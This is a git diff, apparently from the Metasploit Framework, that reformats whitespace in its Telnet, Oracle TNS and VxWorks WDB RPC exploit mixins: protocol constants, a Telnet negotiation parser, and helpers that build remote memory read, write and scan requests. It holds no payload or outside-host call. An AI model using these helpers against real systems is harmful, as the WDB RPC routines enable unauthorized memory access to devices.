DONT = 254.chr # "\376" # "\xfe" # you are not to use option - DO = 253.chr # "\375" # "\xfd" # please, you use option - WONT = 252.chr # "\374" # "\xfc" # I won't use option - WILL = 251.chr # "\373" # "\xfb" # I will use option - SB = 250.chr # "\372" # "\xfa" # interpret as subnegotiation - GA = 249.chr # "\371" # "\xf9" # you may reverse the line - EL = 248.chr # "\370" # "\xf8" # erase the current line - EC = 247.chr # "\367" # "\xf7" # erase the current character - AYT = 246.chr # "\366" # "\xf6" # are you there - AO = 245.chr # "\365" # "\xf5" # abort output--but let prog finish - IP = 244.chr # "\364" # "\xf4" # interrupt process--permanently - BREAK = 243.chr # "\363" # "\xf3" # break - DM = 242.chr # "\362" # "\xf2" # data mark--for connect. cleaning - NOP = 241.chr # "\361" # "\xf1" # nop - SE = 240.chr # "\360" # "\xf0" # end sub negotiation - EOR = 239.chr # "\357" # "\xef" # end of record (transparent mode) - ABORT = 238.chr # "\356" # "\xee" # Abort process - SUSP = 237.chr # "\355" # "\xed" # Suspend process - EOF = 236.chr # "\354" # "\xec" # End of file - SYNCH = 242.chr # "\362" # "\xf2" # for telfunc calls + IAC = 255.chr # "\377" # "\xff" # interpret as command + DONT = 254.chr # "\376" # "\xfe" # you are not to use option + DO = 253.chr # "\375" # "\xfd" # please, you use option + WONT = 252.chr # "\374" # "\xfc" # I won't use option + WILL = 251.chr # "\373" # "\xfb" # I will use option + SB = 250.chr # "\372" # "\xfa" # interpret as subnegotiation + GA = 249.chr # "\371" # "\xf9" # you may reverse the line + EL = 248.chr # "\370" # "\xf8" # erase the current line + EC = 247.chr # "\367" # "\xf7" # erase the current character + AYT = 246.chr # "\366" # "\xf6" # are you there + AO = 245.chr # "\365" # "\xf5" # abort output--but let prog finish + IP = 244.chr # "\364" # "\xf4" # interrupt process--permanently + BREAK = 243.chr # "\363" # "\xf3" # break + DM = 242.chr # "\362" # "\xf2" # data mark--for connect. cleaning + NOP = 241.chr # "\361" # "\xf1" # nop + SE = 240.chr # "\360" # "\xf0" # end sub negotiation + EOR = 239.chr # "\357" # "\xef" # end of record (transparent mode) + ABORT = 238.chr # "\356" # "\xee" # Abort process + SUSP = 237.chr # "\355" # "\xed" # Suspend process + EOF = 236.chr # "\354" # "\xec" # End of file + SYNCH = 242.chr # "\362" # "\xf2" # for telfunc calls - OPT_BINARY = 0.chr # "\000" # "\x00" # Binary Transmission - OPT_ECHO = 1.chr # "\001" # "\x01" # Echo - OPT_RCP = 2.chr # "\002" # "\x02" # Reconnection - OPT_SGA = 3.chr # "\003" # "\x03" # Suppress Go Ahead - OPT_NAMS = 4.chr # "\004" # "\x04" # Approx Message Size Negotiation - OPT_STATUS = 5.chr # "\005" # "\x05" # Status - OPT_TM = 6.chr # "\006" # "\x06" # Timing Mark - OPT_RCTE = 7.chr # "\a" # "\x07" # Remote Controlled Trans and Echo - OPT_NAOL = 8.chr # "\010" # "\x08" # Output Line Width - OPT_NAOP = 9.chr # "\t" # "\x09" # Output Page Size - OPT_NAOCRD = 10.chr # "\n" # "\x0a" # Output Carriage-Return Disposition - OPT_NAOHTS = 11.chr # "\v" # "\x0b" # Output Horizontal Tab Stops - OPT_NAOHTD = 12.chr # "\f" # "\x0c" # Output Horizontal Tab Disposition - OPT_NAOFFD = 13.chr # "\r" # "\x0d" # Output Formfeed Disposition - OPT_NAOVTS = 14.chr # "\016" # "\x0e" # Output Vertical Tabstops - OPT_NAOVTD = 15.chr # "\017" # "\x0f" # Output Vertical Tab Disposition - OPT_NAOLFD = 16.chr # "\020" # "\x10" # Output Linefeed Disposition - OPT_XASCII = 17.chr # "\021" # "\x11" # Extended ASCII - OPT_LOGOUT = 18.chr # "\022" # "\x12" # Logout - OPT_BM = 19.chr # "\023" # "\x13" # Byte Macro - OPT_DET = 20.chr # "\024" # "\x14" # Data Entry Terminal - OPT_SUPDUP = 21.chr # "\025" # "\x15" # SUPDUP - OPT_SUPDUPOUTPUT = 22.chr # "\026" # "\x16" # SUPDUP Output - OPT_SNDLOC = 23.chr # "\027" # "\x17" # Send Location - OPT_TTYPE = 24.chr # "\030" # "\x18" # Terminal Type - OPT_EOR = 25.chr # "\031" # "\x19" # End of Record - OPT_TUID = 26.chr # "\032" # "\x1a" # TACACS User Identification - OPT_OUTMRK = 27.chr # "\e" # "\x1b" # Output Marking - OPT_TTYLOC = 28.chr # "\034" # "\x1c" # Terminal Location Number - OPT_3270REGIME = 29.chr # "\035" # "\x1d" # Telnet 3270 Regime - OPT_X3PAD = 30.chr # "\036" # "\x1e" # X.3 PAD - OPT_NAWS = 31.chr # "\037" # "\x1f" # Negotiate About Window Size - OPT_TSPEED = 32.chr # " " # "\x20" # Terminal Speed - OPT_LFLOW = 33.chr # "!" # "\x21" # Remote Flow Control - OPT_LINEMODE = 34.chr # "\"" # "\x22" # Linemode - OPT_XDISPLOC = 35.chr # "#" # "\x23" # X Display Location - OPT_OLD_ENVIRON = 36.chr # "$" # "\x24" # Environment Option - OPT_AUTHENTICATION = 37.chr # "%" # "\x25" # Authentication Option - OPT_ENCRYPT = 38.chr # "&" # "\x26" # Encryption Option - OPT_NEW_ENVIRON = 39.chr # "'" # "\x27" # New Environment Option - OPT_EXOPL = 255.chr # "\377" # "\xff" # Extended-Options-List + OPT_BINARY = 0.chr # "\000" # "\x00" # Binary Transmission + OPT_ECHO = 1.chr # "\001" # "\x01" # Echo + OPT_RCP = 2.chr # "\002" # "\x02" # Reconnection + OPT_SGA = 3.chr # "\003" # "\x03" # Suppress Go Ahead + OPT_NAMS = 4.chr # "\004" # "\x04" # Approx Message Size Negotiation + OPT_STATUS = 5.chr # "\005" # "\x05" # Status + OPT_TM = 6.chr # "\006" # "\x06" # Timing Mark + OPT_RCTE = 7.chr # "\a" # "\x07" # Remote Controlled Trans and Echo + OPT_NAOL = 8.chr # "\010" # "\x08" # Output Line Width + OPT_NAOP = 9.chr # "\t" # "\x09" # Output Page Size + OPT_NAOCRD = 10.chr # "\n" # "\x0a" # Output Carriage-Return Disposition + OPT_NAOHTS = 11.chr # "\v" # "\x0b" # Output Horizontal Tab Stops + OPT_NAOHTD = 12.chr # "\f" # "\x0c" # Output Horizontal Tab Disposition + OPT_NAOFFD = 13.chr # "\r" # "\x0d" # Output Formfeed Disposition + OPT_NAOVTS = 14.chr # "\016" # "\x0e" # Output Vertical Tabstops + OPT_NAOVTD = 15.chr # "\017" # "\x0f" # Output Vertical Tab Disposition + OPT_NAOLFD = 16.chr # "\020" # "\x10" # Output Linefeed Disposition + OPT_XASCII = 17.chr # "\021" # "\x11" # Extended ASCII + OPT_LOGOUT = 18.chr # "\022" # "\x12" # Logout + OPT_BM = 19.chr # "\023" # "\x13" # Byte Macro + OPT_DET = 20.chr # "\024" # "\x14" # Data Entry Terminal + OPT_SUPDUP = 21.chr # "\025" # "\x15" # SUPDUP + OPT_SUPDUPOUTPUT = 22.chr # "\026" # "\x16" # SUPDUP Output + OPT_SNDLOC = 23.chr # "\027" # "\x17" # Send Location + OPT_TTYPE = 24.chr # "\030" # "\x18" # Terminal Type + OPT_EOR = 25.chr # "\031" # "\x19" # End of Record + OPT_TUID = 26.chr # "\032" # "\x1a" # TACACS User Identification + OPT_OUTMRK = 27.chr # "\e" # "\x1b" # Output Marking + OPT_TTYLOC = 28.chr # "\034" # "\x1c" # Terminal Location Number + OPT_3270REGIME = 29.chr # "\035" # "\x1d" # Telnet 3270 Regime + OPT_X3PAD = 30.chr # "\036" # "\x1e" # X.3 PAD + OPT_NAWS = 31.chr # "\037" # "\x1f" # Negotiate About Window Size + OPT_TSPEED = 32.chr # " " # "\x20" # Terminal Speed + OPT_LFLOW = 33.chr # "!" # "\x21" # Remote Flow Control + OPT_LINEMODE = 34.chr # "\"" # "\x22" # Linemode + OPT_XDISPLOC = 35.chr # "#" # "\x23" # X Display Location + OPT_OLD_ENVIRON = 36.chr # "$" # "\x24" # Environment Option + OPT_AUTHENTICATION = 37.chr # "%" # "\x25" # Authentication Option + OPT_ENCRYPT = 38.chr # "&" # "\x26" # Encryption Option + OPT_NEW_ENVIRON = 39.chr # "'" # "\x27" # New Environment Option + OPT_EXOPL = 255.chr # "\377" # "\xff" # Extended-Options-List - NULL = "\000" - CR = "\015" - LF = "\012" - EOL = CR + LF + NULL = "\000" + CR = "\015" + LF = "\012" + EOL = CR + LF # @@ -213,12 +213,10 @@ module Exploit::Remote::Telnet data.gsub!(/#{EOL}/no, "\n") data.gsub!(/#{IAC}( - [#{IAC}#{AO}#{AYT}#{DM}#{IP}#{NOP}]| - [#{DO}#{DONT}#{WILL}#{WONT}] - [#{OPT_BINARY}-#{OPT_NEW_ENVIRON}#{OPT_EXOPL}]| - #{SB}[^#{IAC}]*#{IAC}#{SE} - )/xno) do - m = $1 + [#{IAC}#{AO}#{AYT}#{DM}#{IP}#{NOP}]|[#{DO}#{DONT}#{WILL}#{WONT}] + [#{OPT_BINARY}-#{OPT_NEW_ENVIRON}#{OPT_EXOPL}]|#{SB}[^#{IAC}]*#{IAC}#{SE} + )/xno) do + m = $1 if m == IAC IAC @@ -249,12 +247,12 @@ module Exploit::Remote::Telnet '' elsif m[0,1] == WONT fd.write(IAC + DONT + m[1,1]) - '' + '' else '' end - end - @trace << data + end + @trace << data @recvd << data fd.flush diff --git a/lib/msf/core/exploit/tns.rb b/lib/msf/core/exploit/tns.rb index a502fd4dd0..12a38b043f 100644 --- a/lib/msf/core/exploit/tns.rb +++ b/lib/msf/core/exploit/tns.rb @@ -82,7 +82,7 @@ module Exploit::Remote::TNS # Version pkt << "\x01\x39" # Version (Compatible) - pkt << "\x01\x2C" + pkt << "\x01\x2C" pkt << "\x00\x81\x08\x00" pkt << "\x7F\xFF" pkt << "\x7F\x08" diff --git a/lib/msf/core/exploit/wdbrpc.rb b/lib/msf/core/exploit/wdbrpc.rb index 3b6b18dbf1..ce4e0dfc6a 100644 --- a/lib/msf/core/exploit/wdbrpc.rb +++ b/lib/msf/core/exploit/wdbrpc.rb @@ -50,9 +50,9 @@ module Exploit::Remote::WDBRPC # WDB_MEM_REGION data << [ - offset, # baseAddress - length, # numberOfBytes - params, # params + offset, # baseAddress + length, # numberOfBytes + params, # params ].pack("N*") wdbrpc_request(40, data) @@ -63,9 +63,9 @@ module Exploit::Remote::WDBRPC # WDB_MEM_REGION data = [ - offset, # baseAddress - length, # numberOfBytes - params, # params + offset, # baseAddress + length, # numberOfBytes + params, # params ].pack("N*") wdbrpc_request(10, data) @@ -75,7 +75,7 @@ module Exploit::Remote::WDBRPC # Make sure its DWORD aligned while(buff.length % 4 != 0) - buff << "\x00" + buff << "\x00" end # WDB_MEM_XFER @@ -92,14 +92,14 @@ module Exploit::Remote::WDBRPC def wdbrpc_request_memscan(offset=0, depth=1024, buff='', params=0) # Make sure its DWORD aligned while(buff.length % 4 != 0) - buff << "\x00" + buff << "\x00" end # WDB_MEM_REGION data = [ - offset, # baseAddress - depth, # numberOfBytes - params, # params + offset, # baseAddress + depth, # numberOfBytes + params, # params ].pack("N*") # WDB_MEM_XFER